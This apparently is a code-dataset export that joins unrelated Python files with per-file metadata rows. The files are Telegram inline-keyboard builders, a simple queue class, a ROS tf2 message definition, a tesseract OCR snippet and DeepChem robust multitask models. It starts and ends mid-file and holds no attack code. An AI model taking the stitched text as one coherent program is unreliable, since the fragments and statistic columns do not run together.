callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[5]}')
product_seven = InlineKeyboardButton(foods[6],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[6]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.add(product_seven)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 8:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[5]}')
product_seven = InlineKeyboardButton(foods[6],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[6]}')
product_eight = InlineKeyboardButton(foods[7],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[7]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.row(product_seven, product_eight)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
class AddProductPhotoCheckGoodShoplist(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'shopping_list\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 3:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2], callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 4:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[3]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 5:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[4]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.add(product_five)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 6:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[5]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 7:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[5]}')
product_seven = InlineKeyboardButton(foods[6],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[6]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.add(product_seven)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 8:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[5]}')
product_seven = InlineKeyboardButton(foods[6],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[6]}')
product_eight = InlineKeyboardButton(foods[7],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[7]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.row(product_seven, product_eight)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
| 68.876833
| 133
| 0.608549
| 2,506
| 23,487
| 5.258579
| 0.02514
| 0.088026
| 0.092882
| 0.121414
| 0.975641
| 0.975641
| 0.975641
| 0.975641
| 0.975641
| 0.975641
| 0
| 0.012191
| 0.287521
| 23,487
| 340
| 134
| 69.079412
| 0.775308
| 0
| 0
| 0.962848
| 0
| 0
| 0.166567
| 0.111726
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024768
| false
| 0
| 0.003096
| 0
| 0.133127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7802f3e8e4505bd645efceaa0cec4fc07662452
| 3,352
|
py
|
Python
|
data_structure/python/queue2.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
data_structure/python/queue2.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
data_structure/python/queue2.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
#---------------------------------------------------------------
# QUEUE (V2)
#---------------------------------------------------------------
# V0
class Queue(object):
def __init__(self, limit = 10):
self.queue = []
self.front = None
self.rear = None
self.limit = limit
self.size = 0
def __str__(self):
return ' '.join([str(i) for i in self.queue])
# to check if queue is empty
def isEmpty(self):
return self.size <= 0
# to add an element from the rear end of the queue
def enqueue(self, data):
if self.size >= self.limit:
return -1 # queue overflow
else:
"""
BEWARE OF IT
-> the queue is in "inverse" order to the array which is the way we implement here in python
i.e.
q = [1,2,3]
but the q is start from 1, end at 3 actually
e.g.
dequeue <---- 1, 2 ,3 <---- enqueue
"""
self.queue.append(data)
# assign the rear as size of the queue and front as 0
if self.front is None:
self.front = self.rear = 0
else:
self.rear = self.size
self.size += 1
# to pop an element from the front end of the queue
def dequeue(self):
if self.isEmpty():
return -1 # queue underflow
else:
"""
BEWARE OF IT
x = [1,2,3]
x.pop(0)
-> x = [2,3]
"""
self.queue.pop(0)
self.size -= 1
if self.size == 0:
self.front = self.rear = 0
else:
self.rear = self.size - 1
def getSize(self):
return self.size
# V1
# https://github.com/yennanliu/Data-Structures-using-Python/blob/master/Queue/Queue.py
class Queue(object):
def __init__(self, limit = 10):
self.queue = []
self.front = None
self.rear = None
self.limit = limit
self.size = 0
def __str__(self):
return ' '.join([str(i) for i in self.queue])
# to check if queue is empty
def isEmpty(self):
return self.size <= 0
# to add an element from the rear end of the queue
def enqueue(self, data):
if self.size >= self.limit:
return -1 # queue overflow
else:
self.queue.append(data)
# assign the rear as size of the queue and front as 0
if self.front is None:
self.front = self.rear = 0
else:
self.rear = self.size
self.size += 1
# to pop an element from the front end of the queue
def dequeue(self):
if self.isEmpty():
return -1 # queue underflow
else:
self.queue.pop(0)
self.size -= 1
if self.size == 0:
self.front = self.rear = 0
else:
self.rear = self.size - 1
def getSize(self):
return self.size
# if __name__ == '__main__':
# myQueue = Queue()
# for i in range(10):
# myQueue.enqueue(i)
# print(myQueue)
# print(('Queue Size:',myQueue.getSize()))
# myQueue.dequeue()
# print(myQueue)
# print(('Queue Size:',myQueue.getSize()))
| 27.702479
| 105
| 0.475835
| 416
| 3,352
| 3.776442
| 0.199519
| 0.091661
| 0.034373
| 0.045831
| 0.805856
| 0.805856
| 0.805856
| 0.754933
| 0.754933
| 0.754933
| 0
| 0.022827
| 0.38574
| 3,352
| 121
| 106
| 27.702479
| 0.740165
| 0.267303
| 0
| 1
| 0
| 0
| 0.001007
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0
| 0.090909
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d78c965dfdeec1e3c008f76bacd3f0b435e1cb18
| 3,437
|
py
|
Python
|
alpyro_msgs/tf2_msgs/lookuptransformaction.py
|
rho2/alpyro_msgs
|
b5a680976c40c83df70d61bb2db1de32a1cde8d3
|
[
"MIT"
] | 1
|
2020-12-13T13:07:10.000Z
|
2020-12-13T13:07:10.000Z
|
alpyro_msgs/tf2_msgs/lookuptransformaction.py
|
rho2/alpyro_msgs
|
b5a680976c40c83df70d61bb2db1de32a1cde8d3
|
[
"MIT"
] | null | null | null |
alpyro_msgs/tf2_msgs/lookuptransformaction.py
|
rho2/alpyro_msgs
|
b5a680976c40c83df70d61bb2db1de32a1cde8d3
|
[
"MIT"
] | null | null | null |
from typing import Final
from alpyro_msgs import RosMessage
from alpyro_msgs.tf2_msgs.lookuptransformactionfeedback import LookupTransformActionFeedback
from alpyro_msgs.tf2_msgs.lookuptransformactiongoal import LookupTransformActionGoal
from alpyro_msgs.tf2_msgs.lookuptransformactionresult import LookupTransformActionResult
class LookupTransformAction(RosMessage):
__msg_typ__ = "tf2_msgs/LookupTransformAction"
__msg_def__ = "dGYyX21zZ3MvTG9va3VwVHJhbnNmb3JtQWN0aW9uR29hbCBhY3Rpb25fZ29hbAogIHN0ZF9tc2dzL0hlYWRlciBoZWFkZXIKICAgIHVpbnQzMiBzZXEKICAgIHRpbWUgc3RhbXAKICAgIHN0cmluZyBmcmFtZV9pZAogIGFjdGlvbmxpYl9tc2dzL0dvYWxJRCBnb2FsX2lkCiAgICB0aW1lIHN0YW1wCiAgICBzdHJpbmcgaWQKICB0ZjJfbXNncy9Mb29rdXBUcmFuc2Zvcm1Hb2FsIGdvYWwKICAgIHN0cmluZyB0YXJnZXRfZnJhbWUKICAgIHN0cmluZyBzb3VyY2VfZnJhbWUKICAgIHRpbWUgc291cmNlX3RpbWUKICAgIGR1cmF0aW9uIHRpbWVvdXQKICAgIHRpbWUgdGFyZ2V0X3RpbWUKICAgIHN0cmluZyBmaXhlZF9mcmFtZQogICAgYm9vbCBhZHZhbmNlZAp0ZjJfbXNncy9Mb29rdXBUcmFuc2Zvcm1BY3Rpb25SZXN1bHQgYWN0aW9uX3Jlc3VsdAogIHN0ZF9tc2dzL0hlYWRlciBoZWFkZXIKICAgIHVpbnQzMiBzZXEKICAgIHRpbWUgc3RhbXAKICAgIHN0cmluZyBmcmFtZV9pZAogIGFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgICB1aW50OCBQRU5ESU5HPTAKICAgIHVpbnQ4IEFDVElWRT0xCiAgICB1aW50OCBQUkVFTVBURUQ9MgogICAgdWludDggU1VDQ0VFREVEPTMKICAgIHVpbnQ4IEFCT1JURUQ9NAogICAgdWludDggUkVKRUNURUQ9NQogICAgdWludDggUFJFRU1QVElORz02CiAgICB1aW50OCBSRUNBTExJTkc9NwogICAgdWludDggUkVDQUxMRUQ9OAogICAgdWludDggTE9TVD05CiAgICBhY3Rpb25saWJfbXNncy9Hb2FsSUQgZ29hbF9pZAogICAgICB0aW1lIHN0YW1wCiAgICAgIHN0cmluZyBpZAogICAgdWludDggc3RhdHVzCiAgICBzdHJpbmcgdGV4dAogIHRmMl9tc2dzL0xvb2t1cFRyYW5zZm9ybVJlc3VsdCByZXN1bHQKICAgIGdlb21ldHJ5X21zZ3MvVHJhbnNmb3JtU3RhbXBlZCB0cmFuc2Zvcm0KICAgICAgc3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogICAgICAgIHVpbnQzMiBzZXEKICAgICAgICB0aW1lIHN0YW1wCiAgICAgICAgc3RyaW5nIGZyYW1lX2lkCiAgICAgIHN0cmluZyBjaGlsZF9mcmFtZV9pZAogICAgICBnZW9tZXRyeV9tc2dzL1RyYW5zZm9ybSB0cmFuc2Zvcm0KICAgICAgICBnZW9tZXRyeV9tc2dzL1ZlY3RvcjMgdHJhbnNsYXRpb24KICAgICAgICAgIGZsb2F0NjQgeAogICAgICAgICAgZmxvYXQ2NCB5CiAgICAgICAgICBmbG9hdDY0IHoKICAgICAgICBnZW9tZXRyeV9tc2dzL1F1YXRlcm5pb24gcm90YXRpb24KICAgICAgICAgIGZsb2F0NjQgeAogICAgICAgICAgZmxvYXQ2NCB5CiAgICAgICAgICBmbG9hdDY0IHoKICAgICAgICAgIGZsb2F0NjQgdwogICAgdGYyX21zZ3MvVEYyRXJyb3IgZXJyb3IKICAgICAgdWludDggTk9fRVJST1I9MAogICAgICB1aW50OCBMT09LVVBfRVJST1I9MQogICAgICB1aW50OCBDT05ORUNUSVZJVFlfRVJST1I9MgogICAgICB1aW50OCBFWFRSQVBPTEFUSU9OX0VSUk9SPTMKICAgICAgdWludDggSU5WQUxJRF9BUkdVTUVOVF9FUlJPUj00CiAgICAgIHVpbnQ4IFRJTUVPVVRfRVJST1I9NQogICAgICB1aW50OCBUUkFOU0ZPUk1fRVJST1I9NgogICAgICB1aW50OCBlcnJvcgogICAgICBzdHJpbmcgZXJyb3Jfc3RyaW5nCnRmMl9tc2dzL0xvb2t1cFRyYW5zZm9ybUFjdGlvbkZlZWRiYWNrIGFjdGlvbl9mZWVkYmFjawogIHN0ZF9tc2dzL0hlYWRlciBoZWFkZXIKICAgIHVpbnQzMiBzZXEKICAgIHRpbWUgc3RhbXAKICAgIHN0cmluZyBmcmFtZV9pZAogIGFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgICB1aW50OCBQRU5ESU5HPTAKICAgIHVpbnQ4IEFDVElWRT0xCiAgICB1aW50OCBQUkVFTVBURUQ9MgogICAgdWludDggU1VDQ0VFREVEPTMKICAgIHVpbnQ4IEFCT1JURUQ9NAogICAgdWludDggUkVKRUNURUQ9NQogICAgdWludDggUFJFRU1QVElORz02CiAgICB1aW50OCBSRUNBTExJTkc9NwogICAgdWludDggUkVDQUxMRUQ9OAogICAgdWludDggTE9TVD05CiAgICBhY3Rpb25saWJfbXNncy9Hb2FsSUQgZ29hbF9pZAogICAgICB0aW1lIHN0YW1wCiAgICAgIHN0cmluZyBpZAogICAgdWludDggc3RhdHVzCiAgICBzdHJpbmcgdGV4dAogIHRmMl9tc2dzL0xvb2t1cFRyYW5zZm9ybUZlZWRiYWNrIGZlZWRiYWNrCgo="
__md5_sum__ = "7ee01ba91a56c2245c610992dbaa3c37"
action_goal: LookupTransformActionGoal
action_result: LookupTransformActionResult
action_feedback: LookupTransformActionFeedback
| 214.8125
| 2,830
| 0.978179
| 56
| 3,437
| 59.571429
| 0.428571
| 0.01199
| 0.016787
| 0.015288
| 0.018885
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102216
| 0.015129
| 3,437
| 15
| 2,831
| 229.133333
| 0.883309
| 0
| 0
| 0
| 0
| 0
| 0.836194
| 0.836194
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.416667
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d797a48a61e35fa1c45ee76feebc7fb386692a9b
| 162
|
py
|
Python
|
ocr.py
|
Arjitg450/Python-Programs
|
0630422c9002632a91b5ccf75f6cd02308c6e929
|
[
"MIT"
] | null | null | null |
ocr.py
|
Arjitg450/Python-Programs
|
0630422c9002632a91b5ccf75f6cd02308c6e929
|
[
"MIT"
] | null | null | null |
ocr.py
|
Arjitg450/Python-Programs
|
0630422c9002632a91b5ccf75f6cd02308c6e929
|
[
"MIT"
] | null | null | null |
import Image
from tesseract import image_to_string
print(image_to_string(Image.open('E:\\aa.png')))
print(image_to_string(Image.open('E:\\aa.png'), lang='eng'))
| 27
| 60
| 0.753086
| 28
| 162
| 4.142857
| 0.464286
| 0.181034
| 0.336207
| 0.310345
| 0.568966
| 0.568966
| 0.568966
| 0.568966
| 0.568966
| 0
| 0
| 0
| 0.061728
| 162
| 5
| 61
| 32.4
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0.141975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
ad26032e2d7aa9cfd81dde5d53fd45a9151f8a95
| 13,696
|
py
|
Python
|
deepchem/models/tensorflow_models/robust_multitask.py
|
0ut0fcontrol/deepchem
|
a680cc126c8b057aa4727b74a7bd175ad8457ef3
|
[
"MIT"
] | null | null | null |
deepchem/models/tensorflow_models/robust_multitask.py
|
0ut0fcontrol/deepchem
|
a680cc126c8b057aa4727b74a7bd175ad8457ef3
|
[
"MIT"
] | null | null | null |
deepchem/models/tensorflow_models/robust_multitask.py
|
0ut0fcontrol/deepchem
|
a680cc126c8b057aa4727b74a7bd175ad8457ef3
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import warnings
import numpy as np
import tensorflow as tf
from deepchem.nn import model_ops
from deepchem.models.tensorflow_models import TensorflowGraph
from deepchem.models.tensorflow_models.fcnet import TensorflowMultiTaskClassifier
from deepchem.models.tensorflow_models.fcnet import TensorflowMultiTaskRegressor
class RobustMultitaskClassifier(TensorflowMultiTaskClassifier):
"""Implements a neural network for robust multitasking.
Key idea is to have bypass layers that feed directly from features to task
output. Hopefully will allow tasks to route around bad multitasking.
"""
def __init__(self,
n_tasks,
n_features,
logdir=None,
bypass_layer_sizes=[100],
bypass_weight_init_stddevs=[.02],
bypass_bias_init_consts=[1.],
bypass_dropouts=[.5],
**kwargs):
warnings.warn("RobustMultiTaskClassifier is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
self.bypass_layer_sizes = bypass_layer_sizes
self.bypass_weight_init_stddevs = bypass_weight_init_stddevs
self.bypass_bias_init_consts = bypass_bias_init_consts
self.bypass_dropouts = bypass_dropouts
super(RobustMultitaskClassifier, self).__init__(n_tasks, n_features, logdir,
**kwargs)
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x num_features.
"""
num_features = self.n_features
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, num_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
bypass_layer_sizes = self.bypass_layer_sizes
bypass_weight_init_stddevs = self.bypass_weight_init_stddevs
bypass_bias_init_consts = self.bypass_bias_init_consts
bypass_dropouts = self.bypass_dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, "All layer params must have same length."
num_layers = lengths_set.pop()
assert num_layers > 0, "Must have some layers defined."
bypass_lengths_set = {
len(bypass_layer_sizes),
len(bypass_weight_init_stddevs),
len(bypass_bias_init_consts),
len(bypass_dropouts),
}
assert len(bypass_lengths_set) == 1, (
"All bypass_layer params" + " must have same length.")
num_bypass_layers = bypass_lengths_set.pop()
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue(
[mol_features] + label_placeholders + weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
top_layer = prev_layer
prev_layer_size = num_features
for i in range(num_layers):
# layer has shape [None, layer_sizes[i]]
print("Adding weights of shape %s" % str(
[prev_layer_size, layer_sizes[i]]))
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = []
# top_multitask_layer has shape [None, layer_sizes[-1]]
top_multitask_layer = prev_layer
for task in range(self.n_tasks):
# TODO(rbharath): Might want to make it feasible to have multiple
# bypass layers.
# Construct task bypass layer
prev_bypass_layer = top_layer
prev_bypass_layer_size = num_features
for i in range(num_bypass_layers):
# bypass_layer has shape [None, bypass_layer_sizes[i]]
print("Adding bypass weights of shape %s" % str(
[prev_bypass_layer_size, bypass_layer_sizes[i]]))
bypass_layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_bypass_layer,
size=bypass_layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_bypass_layer_size, bypass_layer_sizes[i]],
stddev=bypass_weight_init_stddevs[i]),
bias_init=tf.constant(
value=bypass_bias_init_consts[i],
shape=[bypass_layer_sizes[i]])))
bypass_layer = model_ops.dropout(bypass_layer, bypass_dropouts[i],
training)
prev_bypass_layer = bypass_layer
prev_bypass_layer_size = bypass_layer_sizes[i]
top_bypass_layer = prev_bypass_layer
if num_bypass_layers > 0:
# task_layer has shape [None, layer_sizes[-1] + bypass_layer_sizes[-1]]
task_layer = tf.concat(
axis=1, values=[top_multitask_layer, top_bypass_layer])
task_layer_size = layer_sizes[-1] + bypass_layer_sizes[-1]
else:
task_layer = top_multitask_layer
task_layer_size = layer_sizes[-1]
print("Adding output weights of shape %s" % str([task_layer_size, 1]))
output.append(
model_ops.logits(
task_layer,
num_classes=2,
weight_init=tf.truncated_normal(
shape=[task_layer_size, 2], stddev=weight_init_stddevs[-1]),
bias_init=tf.constant(value=bias_init_consts[-1], shape=[2])))
return (output, labels, weights)
class RobustMultitaskRegressor(TensorflowMultiTaskRegressor):
"""Implements a neural network for robust multitasking.
Key idea is to have bypass layers that feed directly from features to task
output. Hopefully will allow tasks to route around bad multitasking.
"""
def __init__(self,
n_tasks,
n_features,
logdir=None,
bypass_layer_sizes=[100],
bypass_weight_init_stddevs=[.02],
bypass_bias_init_consts=[1.],
bypass_dropouts=[.5],
**kwargs):
warnings.warn("RobustMultiTaskRegressor is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
self.bypass_layer_sizes = bypass_layer_sizes
self.bypass_weight_init_stddevs = bypass_weight_init_stddevs
self.bypass_bias_init_consts = bypass_bias_init_consts
self.bypass_dropouts = bypass_dropouts
super(RobustMultitaskRegressor, self).__init__(n_tasks, n_features, logdir,
**kwargs)
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x num_features.
"""
num_features = self.n_features
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, num_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
bypass_layer_sizes = self.bypass_layer_sizes
bypass_weight_init_stddevs = self.bypass_weight_init_stddevs
bypass_bias_init_consts = self.bypass_bias_init_consts
bypass_dropouts = self.bypass_dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, "All layer params must have same length."
num_layers = lengths_set.pop()
assert num_layers > 0, "Must have some layers defined."
bypass_lengths_set = {
len(bypass_layer_sizes),
len(bypass_weight_init_stddevs),
len(bypass_bias_init_consts),
len(bypass_dropouts),
}
assert len(bypass_lengths_set) == 1, (
"All bypass_layer params" + " must have same length.")
num_bypass_layers = bypass_lengths_set.pop()
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue(
[mol_features] + label_placeholders + weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
top_layer = prev_layer
prev_layer_size = num_features
for i in range(num_layers):
# layer has shape [None, layer_sizes[i]]
print("Adding weights of shape %s" % str(
[prev_layer_size, layer_sizes[i]]))
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
